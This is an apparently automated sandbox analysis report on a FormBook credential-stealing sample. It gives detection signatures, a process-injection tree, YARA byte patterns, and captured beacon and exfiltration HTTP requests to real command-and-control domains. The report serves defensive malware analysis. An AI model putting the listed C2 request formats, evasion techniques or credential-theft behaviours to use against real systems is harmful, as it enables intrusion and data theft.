Analysis Report fbfilex.exe

Overview

General Information

Sample Name: fbfilex.exe
Analysis ID: 286347
MD5: 85f6afcb5108fc4abb34af4b61165fc3
SHA1: 4b25756bedfe52c907c4e41c9ff33cde2d96a2cc
SHA256: abdcaa24ca253113905e140a11a445eec5f758bd6403ccf805f87be5c30ea4a3
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • fbfilex.exe (PID: 6712 cmdline: 'C:\Users\user\Desktop\fbfilex.exe' MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
    • fbfilex.exe (PID: 6764 cmdline: {path} MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
    • fbfilex.exe (PID: 6772 cmdline: {path} MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 7124 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • msdt.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5416 cmdline: /c del 'C:\Users\user\Desktop\fbfilex.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • update4hg4upu.exe (PID: 776 cmdline: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
        • ipconfig.exe (PID: 5464 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (listed below)
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | (listed below)
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (listed below)
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(22 entries in total; the remaining entries are not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
27.2.update4hg4upu.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
27.2.update4hg4upu.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (listed below)
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
27.2.update4hg4upu.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | (listed below)
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
27.2.update4hg4upu.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
27.2.update4hg4upu.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (listed below)
  • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 entries in total; the remaining entries are not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: fbfilex.exe; Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe; Avira: detection malicious, Label: TR/Kryptik.obppg
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe; Virustotal: Detection: 38%
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe; ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\Kx2ad\update4hg4upu.exe; Virustotal: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\Kx2ad\update4hg4upu.exe; ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: fbfilex.exe; Virustotal: Detection: 38%
Source: fbfilex.exe; ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match; File source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: fbfilex.exe; Joe Sandbox ML: detected
Source: 27.2.update4hg4upu.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.fbfilex.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\fbfilex.exe; Code function: 4x nop then pop ebx, 3_2_00407AFD
Source: C:\Users\user\Desktop\fbfilex.exe; Code function: 4x nop then pop edi, 3_2_00417B79
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe; Code function: 4x nop then pop ebx, 27_2_00407AFD
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe; Code function: 4x nop then pop edi, 27_2_00417B79

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49735
Source: global traffic; HTTP traffic detected:
    GET /nm8/?BlP=j2AtX6fbeGD14wY2FwtKyV4LPmq5ewzxM8zOxPPeKvmv1woEZvtv/uOqEHkwye1C24Qv&gHu=JlzpxHHpbrFL HTTP/1.1
    Host: www.13and15whipplerd.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic; HTTP traffic detected:
    GET /nm8/?BlP=EC6YEd6Ru8GqjcFjKihj/qcv2AI5sPo9braew08R3VO4TQMKkE23YRJ+xSY46Z0Hr1Yb&gHu=JlzpxHHpbrFL HTTP/1.1
    Host: www.put2cents.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: Joe Sandbox View; IP Address: 184.168.131.241
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic; HTTP traffic detected:
    POST /nm8/ HTTP/1.1
    Host: www.put2cents.com
    Connection: close
    Content-Length: 409
    Cache-Control: no-cache
    Origin: http://www.put2cents.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.put2cents.com/nm8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 42 6c 50 3d 4d 67 32 69 61 37 50 67 67 75 43 36 7a 76 49 4a 61 69 67 43 7e 65 73 33 35 77 30 5f 70 5f 6f 6d 4e 4b 72 43 31 32 45 6f 33 6d 62 35 45 42 6b 73 72 33 48 78 57 78 42 35 68 79 41 56 31 5a 46 52 7a 54 49 4a 66 77 61 39 4b 6e 42 35 6d 70 5a 37 74 49 75 59 53 73 36 2d 51 71 75 65 38 41 56 4c 52 4e 59 59 37 6b 52 79 53 53 4a 52 46 4a 52 64 6c 79 36 48 78 69 62 59 63 48 4c 39 44 53 53 71 37 4d 4e 38 38 6a 58 68 32 55 31 57 73 44 49 57 43 75 57 61 6e 4f 35 7a 6c 49 42 49 54 65 4e 33 4a 4a 7e 79 39 6d 33 78 4c 6d 7e 42 57 5a 69 47 57 50 63 39 57 4e 72 4e 72 43 58 43 31 65 66 36 37 4c 51 78 30 38 49 45 6b 4e 5a 63 6c 52 28 72 53 46 66 4c 4f 52 77 52 71 57 72 4b 31 63 6b 55 64 4f 6e 70 56 59 68 47 79 4c 55 76 43 6b 50 65 4e 53 41 57 41 49 56 2d 49 49 38 5f 73 51 28 47 43 56 30 4d 58 7a 78 51 46 35 62 44 77 31 42 33 6e 31 55 42 57 71 54 69 54 41 79 7a 6a 56 4e 6b 61 38 34 73 6b 59 66 53 54 6b 75 69 71 48 66 69 63 5f 64 79 6e 39 65 54 44 74 31 4e 48 78 6b 67 4e 36 70 53 6e 4e 55 37 54 6b 64 35 63 73 28 50 5a 59 69 71 56 61 49 58 33 6d 41 46 59 4d 69 41 70 79 53 31 76 6b 63 32 38 47 55 4e 38 4e 6a 30 4c 53 59 70 4d 7a 63 4c 42 59 45 62 47 34 53 69 57 6a 62 38 46 66 4f 53 49 4a 38 71 70 46 74 44 73 41 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: BlP=Mg2ia7PgguC6zvIJaigC~es35w0_p_omNKrC12Eo3mb5EBksr3HxWxB5hyAV1ZFRzTIJfwa9KnB5mpZ7tIuYSs6-Qque8AVLRNYY7kRySSJRFJRdly6HxibYcHL9DSSq7MN88jXh2U1WsDIWCuWanO5zlIBITeN3JJ~y9m3xLm~BWZiGWPc9WNrNrCXC1ef67LQx08IEkNZclR(rSFfLORwRqWrK1ckUdOnpVYhGyLUvCkPeNSAWAIV-II8_sQ(GCV0MXzxQF5bDw1B3n1UBWqTiTAyzjVNka84skYfSTkuiqHfic_dyn9eTDt1NHxkgN6pSnNU7Tkd5cs(PZYiqVaIX3mAFYMiApyS1vkc28GUN8Nj0LSYpMzcLBYEbG4SiWjb8FfOSIJ8qpFtDsA).
Source: global traffic; HTTP traffic detected:
    POST /nm8/ HTTP/1.1
    Host: www.put2cents.com
    Connection: close
    Content-Length: 145525
    Cache-Control: no-cache
    Origin: http://www.put2cents.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.put2cents.com/nm8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 42 6c 50 3d 4d 67 32 69 61 36 47 52 7a 75 57 72 69 73 73 49 62 79 51 4b 76 76 63 62 39 77 59 57 71 73 49 59 41 38 7e 66 31 32 55 73 38 46 53 6d 54 67 55 73 74 78 7a 32 62 78 42 34 6a 79 41 57 78 5a 49 75 36 68 49 52 66 31 36 58 4b 6e 4a 32 73 4c 42 2d 38 34 76 51 54 4d 6d 53 59 4b 37 4b 38 44 68 2d 53 76 31 64 7e 6b 4e 79 66 47 6c 66 4f 49 42 61 7a 6d 4b 55 34 79 48 5a 61 44 54 65 44 43 28 58 36 75 77 5a 37 68 6a 5f 39 48 70 4e 78 77 42 44 49 5a 43 42 35 4f 39 30 70 70 56 62 65 66 42 7a 4f 49 7e 51 34 6b 66 2d 49 58 61 4c 52 66 53 34 41 61 38 49 51 63 62 7a 72 46 4c 34 79 74 4c 6e 28 49 6b 35 7a 64 45 2d 72 59 39 65 37 53 6e 4a 44 58 48 36 49 52 42 46 31 45 7a 76 28 74 49 4e 61 4d 76 69 66 61 42 39 30 5f 38 37 52 52 72 69 41 6a 55 65 50 6f 46 42 51 5a 6b 6f 31 52 66 4f 46 51 6b 36 54 6a 77 4f 57 70 62 48 34 55 67 65 32 58 34 4b 65 4b 44 50 4e 51 4b 6b 69 47 4a 53 5a 2d 63 4b 71 63 37 50 41 45 71 2d 6c 58 76 61 5a 63 78 31 78 36 76 6b 64 39 30 4e 48 33 59 37 4e 36 70 65 6e 4d 55 56 53 52 31 35 63 34 7a 51 56 5a 69 32 54 61 4a 4c 31 32 77 44 42 4d 76 4e 70 79 4b 31 70 56 74 72 7e 78 49 4e 34 62 6e 33 4c 7a 59 70 50 44 63 4c 48 59 46 62 41 37 72 79 65 51 76 64 4d 74 36 55 62 5a 55 34 69 6b 67 68 36 71 7a 42 53 30 76 75 57 4a 79 51 32 43 4c 68 6a 59 7a 37 75 54 6c 6b 74 31 41 64 53 4b 34 5f 56 30 61 49 6c 50 48 4c 4d 53 7e 57 77 2d 46 4c 49 48 57 63 7e 4b 6a 71 69 36 49 71 33 68 64 4c 75 43 41 2d 30 56 36 38 65 4d 49 31 6c 4b 7a 68 79 79 6e 59 48 56 4f 70 66 4d 6c 46 4d 71 41 5a 46 4c 67 42 75 6b 71 57 74 67 4d 49 46 34 55 4d 4b 70 5a 4c 67 58 52 6b 35 51 30 69 61 6b 44 5a 7a 63 6d 30 68 73 39 46 68 67 50 62 36 72 75 55 69 77 31 79 36 31 4f 37 76 59 6e 5f 51 64 38 33 32 41 6b 4e 74 4d 45 71 6f 31 62 37 55 53 35 4e 32 68 75 55 69 6d 28 41 42 56 7e 39 28 78 31 4f 65 6d 73 34 6e 5a 58 69 78 62 61 54 58 78 74 6e 69 37 7e 71 4f 6a 45 33 59 34 48 6c 43 66 62 2d 4f 49 49 49 43 4b 71 55 6a 4e 46 50 4b 69 4b 50 58 32 45 48 70 53 36 39 74 76 48 57 39 78 33 49 69 6a 76 47 53 4d 41 36 42 6b 62 34 53 36 66 57 61 5f 34 78 74 36 35 55 6c 61 48 4d 59 32 53 56 34 5f 6e 37 6a 79 33 6f 7e 67 33 4e 4b 58 52 6a 57 44 64 36 6b 4f 28 32 67 65 71 72 35 48 6c 45 58 6b 5a 65 44 33 4e 7a 70 45 58 51 42 4c 7e 76 67 73 49 4e 42 4b 78 70 63 59 61 39 33 6d 41 4d 4c 64 66 46 6a 51 38 55 65 34 42 43 49 30 79 77 77 4f 5a 59 71 74 6b 69 64 67 59 2d 42 31 45 6e 38 37 45 30 78 33 7e 42 41 64 36 46 6b 4c 38 62 47 6b 72 56 6b 77 32 47 6f 69 44 37 4f 38 32 78 44 4f 50 36 44 49 6c 78 62 35 49 4b 6e 37 52 6c 46 33 32 41 69 51 34 4f 53 4f 32 6d 46 50 41 74 35 79 73 33 6c 37 6c 55 68 51 7a 49 4b 4
Source: global traffic; HTTP traffic detected:
    GET /nm8/?BlP=j2AtX6fbeGD14wY2FwtKyV4LPmq5ewzxM8zOxPPeKvmv1woEZvtv/uOqEHkwye1C24Qv&gHu=JlzpxHHpbrFL HTTP/1.1
    Host: www.13and15whipplerd.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic; HTTP traffic detected:
    GET /nm8/?BlP=EC6YEd6Ru8GqjcFjKihj/qcv2AI5sPo9braew08R3VO4TQMKkE23YRJ+xSY46Z0Hr1Yb&gHu=JlzpxHHpbrFL HTTP/1.1
    Host: www.put2cents.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: unknown; DNS traffic detected: queries for: www.13and15whipplerd.com
Source: unknown; HTTP traffic detected:
    POST /nm8/ HTTP/1.1
    Host: www.put2cents.com
    Connection: close
    Content-Length: 409
    Cache-Control: no-cache
    Origin: http://www.put2cents.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.put2cents.com/nm8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 42 6c 50 3d 4d 67 32 69 61 37 50 67 67 75 43 36 7a 76 49 4a 61 69 67 43 7e 65 73 33 35 77 30 5f 70 5f 6f 6d 4e 4b 72 43 31 32 45 6f 33 6d 62 35 45 42 6b 73 72 33 48 78 57 78 42 35 68 79 41 56 31 5a 46 52 7a 54 49 4a 66 77 61 39 4b 6e 42 35 6d 70 5a 37 74 49 75 59 53 73 36 2d 51 71 75 65 38 41 56 4c 52 4e 59 59 37 6b 52 79 53 53 4a 52 46 4a 52 64 6c 79 36 48 78 69 62 59 63 48 4c 39 44 53 53 71 37 4d 4e 38 38 6a 58 68 32 55 31 57 73 44 49 57 43 75 57 61 6e 4f 35 7a 6c 49 42 49 54 65 4e 33 4a 4a 7e 79 39 6d 33 78 4c 6d 7e 42 57 5a 69 47 57 50 63 39 57 4e 72 4e 72 43 58 43 31 65 66 36 37 4c 51 78 30 38 49 45 6b 4e 5a 63 6c 52 28 72 53 46 66 4c 4f 52 77 52 71 57 72 4b 31 63 6b 55 64 4f 6e 70 56 59 68 47 79 4c 55 76 43 6b 50 65 4e 53 41 57 41 49 56 2d 49 49 38 5f 73 51 28 47 43 56 30 4d 58 7a 78 51 46 35 62 44 77 31 42 33 6e 31 55 42 57 71 54 69 54 41 79 7a 6a 56 4e 6b 61 38 34 73 6b 59 66 53 54 6b 75 69 71 48 66 69 63 5f 64 79 6e 39 65 54 44 74 31 4e 48 78 6b 67 4e 36 70 53 6e 4e 55 37 54 6b 64 35 63 73 28 50 5a 59 69 71 56 61 49 58 33 6d 41 46 59 4d 69 41 70 79 53 31 76 6b 63 32 38 47 55 4e 38 4e 6a 30 4c 53 59 70 4d 7a 63 4c 42 59 45 62 47 34 53 69 57 6a 62 38 46 66 4f 53 49 4a 38 71 70 46 74 44 73 41 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: BlP=Mg2ia7PgguC6zvIJaigC~es35w0_p_omNKrC12Eo3mb5EBksr3HxWxB5hyAV1ZFRzTIJfwa9KnB5mpZ7tIuYSs6-Qque8AVLRNYY7kRySSJRFJRdly6HxibYcHL9DSSq7MN88jXh2U1WsDIWCuWanO5zlIBITeN3JJ~y9m3xLm~BWZiGWPc9WNrNrCXC1ef67LQx08IEkNZclR(rSFfLORwRqWrK1ckUdOnpVYhGyLUvCkPeNSAWAIV-II8_sQ(GCV0MXzxQF5bDw1B3n1UBWqTiTAyzjVNka84skYfSTkuiqHfic_dyn9eTDt1NHxkgN6pSnNU7Tkd5cs(PZYiqVaIX3mAFYMiApyS1vkc28GUN8Nj0LSYpMzcLBYEbG4SiWjb8FfOSIJ8qpFtDsA).
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 16 Sep 2020 13:12:32 GMT
    Server: Apache
    Vary: Accept-Encoding,Cookie
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <http://put2cents.com/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2,h2c
    Connection: Upgrade
    Content-Encoding: gzip
    X-Accel-Expires: 10800
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
    Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 6f 24 49 76 24 fa b9 0b e8 ff e0 1d 83 9d ae 82 e8 91 e1 cf f0 a8 66 72 a0 6e 8d 76 05 88 5a 41 33 b3 8b 0b b5 b0 48 26 a3 98 d1 1d cc 67 30 59 e4 68 fe fb 35 3b 1e 99 8c aa 2e 4d d5 ec 68 2f ee 05 2e 40 7a 9e 70 3f 0f 3b 66 76 f9 cd df fd f7 1f 7e ff 7f fd f3 6f d5 6a b8 ef af be 7e 75 c9 5f d5 2f d6 77 f3 a2 5d eb 3f fc ae 50 cb 7e 71 38 cc 8b f5 46 ff 74 50 38 0f c7 bb 42 32 db c5 2d 7f ef db 61 a1 96 ab c5 fe d0 0e f3 e2 0f bf ff 7b 9d 8a f3 fd 7a 71 df ce 8b 63 d7 3e 6e 37 fb 01 cd 36 eb a1 5d 23 ef b1 bb 1d 56 f3 db f6 d8 2d 5b 2d 1f 17 aa 5b 77 43 b7 e8 f5 61 b9 e8 db b9 91 2e 7d b7 fe 59 ed db 7e 5e 6c f7 9b 77 5d df 16 6a b5 6f df cd 8b d5 30 6c 0f 6f 67 b3 bb fb ed 5d b9 d9 df cd de bf 5b cf 8c 14 a1 ec b0 dc 77 db e1 ea f5 bb 87 f5 72 e8 36 eb d7 dc eb cd 1f 79 96 b2 d0 3f 01 98 9a ab 0f 2f ca 7d bb ed 17 cb f6 f5 ec c7 1b d9 f7 c7 9b d9 c5 b7 3f 1d be 7d f3 a7 37 af 6f 37 cb 87 7b 60 2f 4f c1 6f fb 96 3f 6f be bb 9c 8d e3 5e 5d 0e dd d0 b7 57 ff bc b8 6b 41 d5 a0 de 6d 1e d6 b7 97 b3 7c 3b 59 e6 db db f5 41 6f b1 47 3b 2c 57 df e6 8d be 9d cd b6 0f 83 5d a2 e5 a1 5c 6e ee bf 55 b3 2f 28 79 b7 61 fa dd 66 73 d7 b7 8b 6d f7 17 54 1e ca 47 f2 36 49 ce 2f 27 62 c7 ce 87 61 31 74 cb dc 76 b9 df 1c 0e 9b 7d 77 d7 ad 73 67 74 85 a2 eb 76 39 7c 34 b3 58 f4 43 bb 5f 2f 06 e8 35 3c 6d e1 81 c5 76 db 77 cb 05 c5 98 ed 0f 87 bf 79 7f df e3 89 c4 cc 0b f5 eb fd 62 f7 b0 f9 4e fd 7d db de 4e 05 7e fb 11 27 b3 77 92 f0 9f 31 ea 87 cd 3d d5 3b 7c 7e e6 72 cc 9c 0c ff 46 6b f5 fb 55 77 50 87 6e 68 d5 c3 a1 3d a8 61 d5 aa ff 2a 32 a8 bf 5d 2f fa 27 90 76 50 37 4f ea b7 ef 17 cb e1 ba 1d f6 fc de f6 0f e4 ee 18 4b 5b 5a a5 d5 1f 0e dd fa 6e 92 3f ec 17 cb 9f 79 a5 d5 49 86 c7 c7 c7 b2 65 8f fb dc 43 20 29 ad 47 14 ff b4 19 da b7 1f 0e 01 2c 7a 6f f9 b0 df 03 76 ff a4 20 d1 bb ee ee 61 df de aa cd 1a 40 47 dc 25 56 68 f3 06 9b c7 75 bb 57 6b ec 07 0c 1b b5 78 c0 36 eb 81 1c b6 ea b1 1b 56 bf dc ac 5b cb c6 1f 0c 3e b4 c3 00 f0 58 73 b1 6e fb 72 0a 52 fd e1 6f 01 e3 b6 65 ce cb fd ec f3 8c 31 f7 ab af 2e 0f cb 7d b7 1d 18 7e f5 d8 ad 6f 37 8f e5 ff 7a dc b6 f7 9b 9f ba df 9d 86 ce d5 1f 8b 9b c5 a1 fd c3 be 2f de 16 99 be 1f 67 3f 9e 7c fe e3 ac bb 5f dc b5 87 1f a1 e7 be fd 71 26 c5 3f ce 8c 2b ab b2 fa 71 56 db f7 b5 fd 71 56 5c 14 ed fb 01 f5 e5 76 7d 87 8f c3 f1 ee 7f af 1f 0a a5 1b 7e 7f 9b 1b 22 e2 f7 e6 61 bf 6c 8b b7 7f 2c a0 0a f9 65 d9 d8 5f da 7f e0 bd 1f 67 8f 5b dd ad 97 fd c3 2d 27 fd 74 90 0b a9 d1 fb b6 6f b1 6e 79 df ad cb 9f 0e bf 39 b6 fb 79 28 43 69 8a 3f fd
